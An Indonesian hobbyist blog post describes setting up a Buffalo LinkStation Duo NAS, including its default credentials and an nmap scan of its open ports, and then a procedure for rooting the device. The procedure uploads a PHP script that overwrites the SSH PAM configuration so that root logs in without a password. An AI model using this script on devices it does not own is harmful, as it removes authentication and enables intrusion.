Hari ini mencoba akses Buffalo NAS LinkStation Duo 2 TB LS-WXL[1]. Panduan yg tersedia memberikan informasi yang cukup singkat, tersedia petunjuk untuk memasang dan cara mengakses NAS memakai NASNavigator 2 (versi 2.22). Pemasangan NAS cukup ringkas, pasang adaptor dan kabel UTP ke switch. Switch terhubung ke server DHCP.
NASNavigator tersedia versi Mac dan Windows, tidak tersedia versi Linux. Akhirnya memasang yang versi Mac. Setelah terpasang, NASNavigator mendeteksi keberadaan NAS, memunculkan alamat IP dan memunculkan versi firmware, yaitu 1.34. Selanjutnya alamat IP dimasukkan ke peramban Firefox, masukkan nama pengguna “admin” dan kata sandi “password”.
NASNavigator bagi yang memiliki komputer hanya memasang Linux akan cukup merepotkan. Pemakai Linux dapat memakai trik berikut:
- Siapkan dan konfigurasi DHCP server
- Pantau log DHCP server saat NAS dipasang ke switch
- Catat alamat IP yang dipakai NAS
- Masukkan alamat IP ke peramban Firefox
- Lakukan konfigurasi NAS melalui peramban
Saat melakukan konfigurasi melalui peramban diketahui banyak layanan atau service yang ada di NAS. Pemeriksaan dengan memakai nmap memunculkan beragam port, yaitu:
Starting Nmap 5.51 ( http://nmap.org ) at 2011-11-28 18:09 WIT
Nmap scan report for term-x.xxx-168-192.int.lipi.go.id (192.168.xxx.x)
Host is up (0.0013s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
515/tcp open printer
873/tcp open rsync
3689/tcp open rendezvous
8873/tcp open dxspider
9010/tcp open sdr
9050/tcp open tor-socks
22939/tcp open unknown
50000/tcp open ibm-db2
Layanan yang membuat tertarik untuk dicoba adalah port 22 atau ssh. Percobaan melakukan ssh ke alamat IP NAS tidak berhasil masuk. Setelah mengisi dengan benar, login dipaksa keluar. Pencarian informasi ke google.com menunjukkan ssh secara default tidak dibolehkan oleh produsen NAS. Bahkan ada informasi, akses ssh akan membatalkan garansi NAS 🙁
Pencarian cara memperoleh akses root ke Buffalo NAS LinkStation Duo 2 TB LS-WXL akhirnya berhasil menemukan komunitas yang mengeksplorasi NAS[2]. Berikut cara memperoleh akses root di NAS LS-WXL dengan firmware 1.34, yaitu:
- Jalankan peramban, masukkan IP NAS, login dengan admin dan password
- Buat folder shared dengan nama “www”
- Aktifkan web server, dari menu Network -> Web Server
- Set nomor port Web Server ke 81
- Set tarhet folder ke www
- Buat skrip di komputer lokal dengan nama (misal) “root.php”
- Unggah root.php ke folder www
- Jalankan peramban, akses ke: http://IP-NAS:81/root.php
- Coba akses ssh ke IP-NAS: $ ssh root@IP-NAS
- Jika sukses, akan masuk NAS tanpa password.
Skrip root.php
<?php
$file = '../../../../etc/pam.d/sshd';
$fh=fopen($file, 'w') or die("can't open file");
$stringData = "account required pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "session required pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "auth required pam_permit.so\n";
fwrite($fh, $stringData);
fclose($fh);
?>
Taut:
[1] http://www.buffalo-technology.com/products/network-storage/linkstation/ls-wxl-linkstation-duo/
[2] http://buffalo.nas-central.org/wiki/Category:LS-WXL